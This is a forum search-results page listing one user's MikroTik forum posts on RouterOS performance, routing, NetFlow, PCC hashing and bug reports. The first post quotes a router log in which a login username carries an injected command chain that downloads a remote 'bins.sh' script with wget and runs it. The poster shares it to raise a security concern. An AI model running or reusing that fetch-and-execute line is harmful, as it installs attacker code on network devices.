Community discussions

Search found 37 matches

by exa
Mon Jun 13, 2016 11:52 am
Forum: General
Topic: Login security - possible username shellcode injection?
Replies: 1
Views: 711

Login security - possible username shellcode injection?

Hi everyone, we just saw this in one of our routers' logs: system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet system,error,critical login failure fo...
by exa
Fri May 29, 2015 8:24 pm
Forum: Announcements
Topic: v6.29 released
Replies: 193
Views: 49958

Re: v6.29 released

*) added ~fasttrack-connection~ firewall action in filter/mangle tables for marking connections as fasttrack; Is the fasttracked connection still accounted in traffic flow? Or, at least, the NAT event from the trafflow improvement? What format and for what collector are the NAT events anyway, do th...
by exa
Fri Feb 13, 2015 4:10 pm
Forum: Forwarding Protocols
Topic: CPU usage issues with MPLS setup
Replies: 2
Views: 1034

CPU usage issues with MPLS setup

Hello, I was trying to set up a basic MPLS/VPLS service on several smaller mikrotik routers in the network - they don't do anything special except for routing (~2000 routes from OSPF) on ethernets. There seems to be a problem with the routers - whenever anything that seems to be connected with MPLS ...
by exa
Wed Feb 11, 2015 10:13 am
Forum: General
Topic: Feature Request: IPerf
Replies: 50
Views: 11215

Re: Feature Request: IPerf

+1

Oh please.

Or add jitter/latency and similar stats to bandwidth test. I guess iperf compatibility is easier.
by exa
Mon Jan 05, 2015 12:23 pm
Forum: General
Topic: [feature request] More information in netflow packets
Replies: 0
Views: 326

[feature request] More information in netflow packets

Hello, in short - would it be possible to also include "Reply source address/port" and "Reply destination address/port" in Netflow packets generated by mikrotik routers? The reason is that when doing a NAT, netflow monitoring gets largely useless because of the fact that the two entries most preciou...
by exa
Mon Jul 21, 2014 8:01 pm
Forum: General
Topic: TCP performance over Mikrotik
Replies: 14
Views: 11379

Re: TCP performance over Mikrotik

Does anybody have any clue? Well, honestly: We have closed this problem because we don't really know what caused it, and with disappearance of some devices that seemed to be "more harmful" it looks okay. If you have the problem, make sure you have: - version 6 - no powerPC, especially not rb1100/12...
by exa
Fri Feb 14, 2014 3:59 pm
Forum: General
Topic: IGMP Snooping
Replies: 137
Views: 60222

Re: IGMP Snooping

Hello guys,

any updates on IGMP-Snooping? I guess it's very simple to implement (one simple sysctl in underlying linux) and actually a "big feature" saving lots of $ for infrastructure switches that could be replaced/eliminated by (say) CCR.

Thanks very much!
-mk
by exa
Mon Jan 20, 2014 1:11 pm
Forum: RouterBOARD hardware
Topic: CLOUD CORE ROUTER
Replies: 1374
Views: 1016861

Re: CLOUD CORE ROUTER

Hey everyone, I've already mailed MTk support with this, but why not share it here: We have some CCRs deployed (on some very exposed locations, e.g. gigabits). With some CCRs we've been having following kind of problem: - Connection tracking randomly fails (e.g. some connections just don't go throug...
by exa
Mon Jan 20, 2014 12:26 pm
Forum: General
Topic: [feature request] Setting NTP servers using hostnames
Replies: 1
Views: 629

[feature request] Setting NTP servers using hostnames

Hello, in short -- is there any chance to set NTP servers using DNS names? Like this: /system ntp client set primary-ntp=ntp1.xxx.cz secondary-ntp=ntp2.xxx.cz I know that it can be done from Winbox, but the joke is that it only translates the DNS names to fixed IP addresses in-place, and saves the I...
by exa
Wed Dec 26, 2012 1:16 am
Forum: General
Topic: TCP performance
Replies: 74
Views: 26494

Re: TCP performance

Problem solved. The problem caused a switch at.... Hey guys! this is not solved, I don't have any badly configured switches in the way (particularly, absolutely no switches!) :D Anyway, I'm also starting to think that this is at all times a weird combination of several unpleasant issues (signal, co...
by exa
Tue Dec 04, 2012 11:07 pm
Forum: General
Topic: TCP performance
Replies: 74
Views: 26494

Re: TCP performance

(.....) Maybe this issue is affected by hardware revisions in conjunction with ROS version or something?
Could you post the versions of your firmware/bootloader please?

(btw. it's most probably not about RouterOS version, I had the latest 5.21 on everything)

Thanks,
-exa
by exa
Mon Dec 03, 2012 9:35 pm
Forum: General
Topic: TCP performance
Replies: 74
Views: 26494

Re: TCP performance

Do you get these results in both directions?
Yes, there's practically no difference (test lab setup is symmetrical anyway.)
by exa
Fri Nov 30, 2012 4:51 pm
Forum: General
Topic: TCP performance
Replies: 74
Views: 26494

Re: TCP performance

Thanks for image, hapi!

The similarity between your and my measured speeds is actually striking me.

I can only add that NV2 doesn't make the problem, it's the same with whichever variant of 802.11a/b/g/n and/or nstreme.
by exa
Fri Nov 30, 2012 3:44 pm
Forum: General
Topic: TCP performance
Replies: 74
Views: 26494

TCP performance

Hello, I've been seeing this topic repeated several times on the forum with no sufficciently good explanation or solution, so don't blame me for reposting, I just want this working. The problem is the TCP performance over various mikrotik routers. I've already been solving this once, when I saw that...
by exa
Mon May 28, 2012 12:28 pm
Forum: General
Topic: TCP performance over Mikrotik
Replies: 14
Views: 11379

Re: TCP performance over Mikrotik

interface queue - change to hardware queue only (if multi core then to multi-fifo queue) Wow, seems that helped a lot. "only-hardware-queue" did nothing, but after setting multiqueue fifo, throughput was finally hitting line limits. Do you have any idea what would the root cause be? I'm suspecting ...
by exa
Mon May 28, 2012 10:28 am
Forum: General
Topic: TCP performance over Mikrotik
Replies: 14
Views: 11379

Re: TCP performance over Mikrotik

Paste and "/export compact" here - use the latest version. Also what kind of traffic are yu using for your testing? Only speedtest? This is the export of one affected live machine. I have XXXXxx'ed/deleted everything confidental, nothing interesting was lost. # may/28/2012 09:16:03 by RouterOS 5.14...
by exa
Mon May 28, 2012 10:01 am
Forum: General
Topic: TCP performance over Mikrotik
Replies: 14
Views: 11379

TCP performance over Mikrotik

Hey everyone, I'm experiencing a strange problem with some of our gateways. It has already been here (unsolved) with some variations: http://forum.mikrotik.com/viewtopic.php?f=7&t=60663 http://forum.mikrotik.com/viewtopic.php?f=7&t=60337 The general problem is following - Suppose you have three mikr...
by exa
Mon May 28, 2012 8:56 am
Forum: General
Topic: 5.16 - x86 configured as l7 shaper rebooted
Replies: 8
Views: 1943

Re: 5.16 - x86 configured as l7 shaper rebooted

I would blame the 82574L - it has a weird bug that causes it to freeze/restart on heavy usage (500+Mbit) with MSI-X turned on. See intel's errata. No idea whether this is a real cause of your reboot, on my configurations the problem always appeared as interface going down/up, but from the errata it ...
by exa
Fri May 11, 2012 12:46 am
Forum: Wireless Networking
Topic: NV2 disconnect problem
Replies: 138
Views: 23191

Re: NV2 disconnect problem

Hey there, First I, for one, want to confirm this -- happening both on PtP and PtMP connections with no visible cause. What's strange: I got a PtMP connection where one client is disconnecting and the other isn't. I tried to go through their settings, but it seems like those are _totally the same_ -...
by exa
Mon Apr 23, 2012 4:40 pm
Forum: General
Topic: v5.15 released!
Replies: 150
Views: 29634

Re: v5.15 released!

Hello guys, I got a strange bug in 5.15: when I create users through terminal, say with /user add name=xxx password=yyy group=zzz , the user actually gets created without a password (so anyone can login as xxx). Workaround is to use /user set xxx password=yyy but that still leaves some time window f...
by exa
Sat Dec 17, 2011 11:44 am
Forum: General
Topic: Partial configuration resets problem
Replies: 1
Views: 327

Partial configuration resets problem

Hey guys, so I am trying to resolve one weird issue we're seeing on some of our routers last 2-3 weeks. Whenever someone changes some settings there (e.g. adds things to addresslist, changes e-mail settings, changes queues, etc), sometimes the changes just return back without any notice (which cause...
by exa
Fri Sep 16, 2011 11:54 pm
Forum: General
Topic: mikrotik kernel question
Replies: 5
Views: 762

Re: mikrotik kernel question

value is 1000 and you can't change it
Nice, thanks very much!

@martini: 80kpps is not very high, but I'm still getting a small but still annoying percent of packet drops.

At least now I have some idea where to start with solving this stuff :]

Thanks again&have a nice day
-exa
by exa
Fri Sep 16, 2011 3:44 pm
Forum: General
Topic: mikrotik kernel question
Replies: 5
Views: 762

Re: mikrotik kernel question

because we're trying to fix some packet loss occuring when a router goes under a huge packet load (+80Kp/s) showing up as RX drops, so I miss some kind of such tunable - increasing the ring buffer size usually fixes stuff in such situations (in linux... 8) ). The closest setting that also (kindof) f...
by exa
Thu Sep 15, 2011 4:19 pm
Forum: General
Topic: mikrotik kernel question
Replies: 5
Views: 762

mikrotik kernel question

Hello guys,
quick questions:

1] on mikrotik routers, what is the value of sys.net.core.netdev_max_backlog sysctl? (or some equally-working tunable, if mikrotiks have one..)

2] if it exists, is there some good method to increase/decrease it?

Thanks very much :]

-exa
by exa
Fri May 20, 2011 11:33 am
Forum: General
Topic: 5.x ssh bug
Replies: 7
Views: 2707

Re: 5.x ssh bug

Does not work for me, even with 5.2. Observation: RouterOS is closing the SSH connection some time before it actually ends sending data. Happens only in "Single command" ssh mode, not with actual PTY allocated. What actually happens: ssh user@mik.ro.tik.ip '/export' |wc -c gives around 12k less byte...
by exa
Thu Mar 24, 2011 2:56 pm
Forum: Forwarding Protocols
Topic: lftp pcc problem
Replies: 1
Views: 763

Re: lftp pcc problem

Disable connection helpers (Ip/Firewall/Service ports), and activate lftp Passive connection (see ftp:passive-mode in http://lftp.yar.ru/lftp-man.html )

That should help.
by exa
Tue Mar 15, 2011 9:59 am
Forum: Forwarding Protocols
Topic: [routing filter] disable OSPF distribution of certain routes
Replies: 3
Views: 2049

Re: [routing filter] disable OSPF distribution of certain ro

only external routes can be filtered
Uh, okay. Any other method how to achieve this?

thx
by exa
Mon Mar 14, 2011 6:36 pm
Forum: Forwarding Protocols
Topic: lftp problems
Replies: 1
Views: 736

Re: lftp problems

Try using passive FTP connection, put this into ~/.lftprc :

ftp:passive-mode true

If this doesn't help, blame lftp or some underlying layer (but I doubt it would be the case).
by exa
Mon Mar 14, 2011 5:26 pm
Forum: Forwarding Protocols
Topic: [routing filter] disable OSPF distribution of certain routes
Replies: 3
Views: 2049

[routing filter] disable OSPF distribution of certain routes

Hi, So there I have a network where one of the routers is connected to some littly different network, unfortunately with pretty similar IP address range. I was wondering if there's an easy way to block this IP range from being routed to other machines (the connected route distributes self via OSPF, ...
by exa
Tue Feb 22, 2011 8:42 pm
Forum: General
Topic: [Firewall] PCC internals
Replies: 4
Views: 627

Re: [Firewall] PCC internals

Yeah, I was kindof afraid of that. Gonna try it though, knowing the exact function would spare me a whole lot of work.
by exa
Tue Feb 22, 2011 10:13 am
Forum: General
Topic: [Firewall] PCC internals
Replies: 4
Views: 627

Re: [Firewall] PCC internals

Well, the first document actually lists the hash function as simple |-ing the fields together. I wonder what the | operation is? to me it seems like XOR, but that wouldn't actually be 'hashing', afaik..

Thanks
-mk
by exa
Mon Feb 21, 2011 10:46 pm
Forum: General
Topic: [Firewall] PCC internals
Replies: 4
Views: 627

[Firewall] PCC internals

Hello, is there some good documentation about the PCC classifier? I'd like to tune it a little, and probably be able to understand completely how it works (what is the hash function, to be exact), so any documentation on given topic would be great. Is there at least some simple info how is PCC match...
by exa
Wed Feb 09, 2011 8:25 pm
Forum: General
Topic: PCC (per-connection-classifier) hash function
Replies: 2
Views: 1485

Re: PCC (per-connection-classifier) hash function

Ah nice, thanks. It would be nice to have a hashing function that can be tuned by hand, simple u32 match against some bit of IP address would do. Are there some possible plans for u32?

Thanks
by exa
Wed Feb 09, 2011 7:00 pm
Forum: General
Topic: PCC (per-connection-classifier) hash function
Replies: 2
Views: 1485

PCC (per-connection-classifier) hash function

Hiho, I was wondering if there's any documentation or description about what the exact hash function used in PCC (or the algorithm, or anything similar) is. I'd like to compute by hand which PCC division group does, say, given src-address fall into. (my problem is that I use PCC to separate customer...
by exa
Mon May 24, 2010 1:15 pm
Forum: General
Topic: MacTelnet for linux?
Replies: 1
Views: 522

MacTelnet for linux?

Hullow, I know this has already been asked here (possibly several times) but It would be great if there was an actual mactelnet client for linux. Window's mactelnet.exe works on windows and (sometimes) under wine, but people with pure linux without X11, or running ARM platform are left unhappy. (spe...
by exa
Mon Jul 06, 2009 9:12 pm
Forum: General
Topic: some mail problems
Replies: 3
Views: 576

Re: some mail problems

Hm, i finally came to the problem - something just delays the connection for those 20 seconds between the two boxes, so I guess mikrotik just timeouts and then asks the smtp nicely to quit (no idea how the mail sending code is written, but looks like a fair guess doesnt it :D ) the thing between is ...
by exa
Sat Jul 04, 2009 2:19 pm
Forum: General
Topic: some mail problems
Replies: 3
Views: 576

some mail problems

Hi there, I came accross a very strange problem with /tool email. When invoked, mikrotik tries to send the mail, but fails, with message "server is not ready". On the SMTP server (which is properly configured, working and tested, i made this for sure), I see only following error in the postfix log: ...